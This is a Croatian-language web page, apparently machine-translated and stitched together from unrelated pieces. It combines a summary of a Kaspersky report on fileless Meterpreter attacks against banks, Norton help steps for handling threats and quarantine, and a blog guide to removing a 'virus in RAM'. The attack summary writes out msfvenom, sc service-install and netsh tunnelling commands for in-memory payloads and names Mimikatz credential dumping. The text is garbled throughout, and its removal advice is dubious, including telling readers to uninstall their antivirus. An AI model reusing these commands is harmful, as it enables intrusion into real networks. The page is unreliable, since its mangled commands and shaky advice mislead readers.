Pregledajte i popravite sigurnosne prijetnje uređaja koje je otkrio Norton. "Nevidljivi" zlonamjerni softver ne ostavlja datoteke, skriva se u memoriji i napada velike tvrtke Ispravljanje prijetnji koje nisu eliminirane tijekom skeniranja

o uzbudljivoj novoj kampanji zlonamjernog softvera koja je zahvatila banke, telekomunikacije, vladine agencije i druge tvrtke i organizacije u više od četrdeset zemalja diljem svijeta.

Analitičari tima GReAT pišu da su stručnjaci tima za bankovnu sigurnost prvi uočili prijetnju: tada u fizička memorija kontroler domene pronašao je Meterpreter kod. Proizvodi Kaspersky Laba prepoznaju probleme kao što su MEM: Trojan.Win32.Cometer i MEM: Trojan.Win32.Metasploit. Kada su analitičari počeli shvaćati, pokušavajući razumjeti odakle je kod došao u memoriji, pronašli su i PowerShell skripte u Windows registar, i uslužni program NETSH, koji je korišten za tuneliranje prometa do napadačevog zapovjednog i upravljačkog poslužitelja.

Ti se napadi nazivaju napadi bez datoteka, što znači da zlonamjerni softver ne postavlja nikakve datoteke na tvrdi disk, već se korisni teret ubrizgava izravno u memoriju i postoji unutar RAM-a. Naravno, izuzetno je teško otkriti i pratiti takav napad.

Shema napada

Istraživači objašnjavaju da se dobro poznati okvir Metasploit može koristiti za izradu skripti, kao u primjeru ispod.

Ovakve skripte pomažu ubrizgavanju Meterpretera u RAM. Msfvenom iz Metasploita može se koristiti za njihovo generiranje:

Msfvenom -p windows / meterpreter / bind_hidden_tcp AHOST = 10.10.1.11 -f psh-cmd

Kada se skripta generira, napadači koriste Windows SC za instaliranje zlonamjerne usluge na ciljni host (koji će na kraju izvršiti gornju skriptu). To se može učiniti, na primjer, pomoću sljedeće naredbe:

sc \\ target_name create ATITscUA binpath = "C: \ Windows \ system32 \ cmd.exe / b / c start / b / min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA..." start = manual

Sljedeći korak je konfiguriranje tuneliranja tako da zaraženi stroj postane dostupan udaljenom hostu. Da bi to učinili, napadači koriste sljedeću naredbu:

netsh sučelje portproxy add v4tov4 listenport = 4444 connectaddress = 10.10.1.12 connectport = 8080 listenaddress = 0.0.0.0

Kao rezultat toga, sav mrežni promet od 10.10.1.11:4444 bit će preusmjeren na 10.10.1.12:8080. Ova tehnika vam omogućuje da uspostavite proxy tunel kroz koji kriminalci mogu daljinski kontrolirati host zaražen PowerShellom.

Analitičari ističu da korištenje SC-a i NETSH-a zahtijeva administratorske privilegije na lokalnim i udaljenim hostovima. Korištenje zlonamjernih PowerShell skripti također će zahtijevati eskalaciju privilegija i promjene u politici izvršavanja. Da bi to učinili, napadači koriste Mimikatz dumper vjerodajnica, prikupljajući lozinke s računa na lokalnom računalu i okolnim radnim stanicama.

Pomno proučavajući napad na jednu od pogođenih banaka, istraživači su došli do zaključka da su operateri ove kampanje koristili domene treće razine, kao i domene u zonama .GA, .ML, .CF. Činjenica je da su takve domene besplatne, što znači da napadači ne ostavljaju za sobom WHOIS podatke.

Rezimirajući sve gore navedeno (pomoću Metasploita i standard Windows uslužni programi domene bez WHOIS informacija), znanstvenici zaključuju da je rukopis nepoznatih napadača vrlo sličan radu grupa kao što su GCMAN i Carbanak. Međutim, nema izravnih dokaza, pa nije moguće povezati te tihe napade s bilo kojom određenom skupinom.

“Tehnike poput onih opisanih u ovom izvješću postaju sve češće, osobito [kada se provode napadi] na velike mete u bankarskoj industriji. Nažalost, korištenje jednostavnih alata, u kombinaciji s raznim trikovima, čini otkrivanje [takvih napada] iznimno teškim”, sažimaju stručnjaci GReAT-a.

Kada Norton otkrije prijetnju, automatski je uklanja, osim ako je vaša intervencija neophodna da bi se utvrdilo kako će se s prijetnjom postupati. U takvim slučajevima Norton prikazuje obavijest "Otkrivene prijetnje" ili "Sigurnosni rizik" s dostupnim opcijama za odgovor na prijetnju.

Pregledajte prijetnje koje su automatski otklonjene tijekom skeniranja

    Pokreni Norton.

    Sigurnost uređaja, kliknite Otvori.

    U prozoru Sigurnosni dnevnik Uklonjene sigurnosne prijetnje.

    Odaberite prijetnju s popisa i pregledajte poduzete radnje u oknu s detaljima.

U nekim slučajevima, umjesto automatskog otklanjanja prijetnje, Norton preporučuje da poduzmete određenu radnju kako biste je otklonili.

Popravljanje prijetnji koje nisu bile riješene tijekom skeniranja

    Pokreni Norton.

    Ako se prozor My Norton pojavi pored Sigurnost uređaja, kliknite Otvori.

    U glavnom prozoru Nortona dvaput kliknite Sigurnost, a zatim odaberite Povijest.

    U prozoru Sigurnosni dnevnik na popisu Prikaži odaberite Neriješene sigurnosne prijetnje.

    Ako popis sadrži neriješene prijetnje, odaberite prijetnju koja vas zanima.

Ako postoji bilo kakav razlog vjerovati da je vaš sustav zaražen, pokrenite Norton Power Eraser. Norton Power Eraser je moćan alat uklanjanje zlonamjernog softvera kako biste se riješili najsnažnijih sigurnosnih prijetnji. Za više informacija pogledajte dokument Pokrenite Norton Scan za prijetnje računala

Norton Power Eraser je agresivan alat za uklanjanje zlonamjernog softvera. Ponekad zajedno sa zlonamjernog softvera Norton Power Eraser može ukloniti pouzdane datoteke, stoga pažljivo pregledajte rezultate skeniranja prije brisanja bilo koje datoteke.

Norton prema zadanim postavkama uklanja sigurnosne prijetnje s vašeg računala i stavlja ih u karantenu. Ako imate razloga vjerovati da je datoteka izbrisana pogreškom, možete je vratiti iz karantene na izvorno mjesto i isključiti je iz naknadnih skeniranja.

Vraćanje datoteke iz karantene

    Pokreni Norton.

    Ako se prozor My Norton pojavi pored Sigurnost uređaja, kliknite Otvori.

    U glavnom prozoru Nortona kliknite Sigurnost, a zatim odaberite Povijest.

    U prozoru Sigurnosni dnevnik proširite izbornik Prikaži i odaberite opciju Karantena.

    Odaberite datoteku koju želite oporaviti.

    U oknu s detaljima kliknite Opcije.

    U prozoru Opasnost otkrivena odabrati tim Oporavite i isključite ovu datoteku.

    U prozoru Vraćanje iz karantene kliknite gumb Da.

    U prozoru Potraži mapu odaberite mapu ili pogon u koji ćete postaviti oporavljenu datoteku i kliknite U redu.

Virus unutra RAM memorija, ova pojava je dosta neugodna i nažalost nije rijetka. vrlo često vidimo skrivenu datoteku, ali je ne možemo izbrisati ni na koji način - sve se pojavljuje i pojavljuje, ili sama operacijska soba Windows sustav ne dopušta da se to učini.

Usput, mnogo se češće manifestira u slučajevima pogrešna postavka antivirusni program ili nedostatak istog. Ako imate takvu situaciju, preporučam da pročitate članak - instaliranje i konfiguriranje antivirusnog programa na Windowsima. Prije nego što uklonite virus iz RAM-a, trebali biste shvatiti što se događa s antivirusnim programom instaliranim na vašem računalu. Najvjerojatnije je vaš antivirusni program "uništio" virus koji se pojavio. Moguće je da u arsenalu potpisa vašeg antivirusnog programa ne postoji metoda za potpuno brisanje virusa iz pravodobne zbirke i program ga samo pokušava ukloniti virusna infekcija, a ne sam virus.

Često postoje situacije kada virus prenosi programe i dodatne datoteke za vlastiti rad ili automatski počinje raditi, a sada će antivirusni program otkriti te kopije, ali neće otkriti sam izvor (virus) i u većini slučajeva ne može se nositi s tim.

  1. Uklanjamo (pomoću programa za deinstalaciju - dodavanje / uklanjanje programa) instalirani antivirusni program, ovdje je beskorisno.
  2. Preuzmite Ccleaner s interneta i instalirajte ga. Za početak, prvo brišemo privremene mape. Ovaj softver odgovara obični korisnici, na temelju toga moguće je staviti sve potvrdne okvire postavke - korisnik neće izbrisati podatke! Više o programu napisao sam u članku - čišćenje registra.
  3. Tada će nam pomoći uslužni program za čišćenje virusa. O njima sam pisao u članku - besplatni uslužni programi za uklanjanje virusa. Biramo bilo koju. Na primjer, preuzmite program Dr.web Cure it s Interneta i instalirajte ga.
  4. Instaliramo ažuriranje, pokrećemo jedno od dva skeniranja (brzo ili potpuno). Brzo skeniranje u principu daje učinkovit rezultat. Brišemo sve otkrivene viruse. Ponovno pokrećemo računalo.
  5. Preuzimanje novog antivirusnog programa. To je temeljno važno! U slučaju da ste upali u nevolje, instalirali ste antivirusni Eset NOD32 antivirus, zatim instalirajte Avast ili Avira, ako je Avast instaliran, instalirajte Eset ili bilo koji drugi antivirusni program po vašem izboru.
  6. Takve je radnje prilično lako protumačiti, antivirusni program koji ste imali najvjerojatnije je oštećen, podaci u registru su imali priliku ostati, a to će dovesti do netočnog rada antivirusnog programa, pogotovo jer ovaj antivirusni program nije pronaći prijetnju s interneta na svom računalu.